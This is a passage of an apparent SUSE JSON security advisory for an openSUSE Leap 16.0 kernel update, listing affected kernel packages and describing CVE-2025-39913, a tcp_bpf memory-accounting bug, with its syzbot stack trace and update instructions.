"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
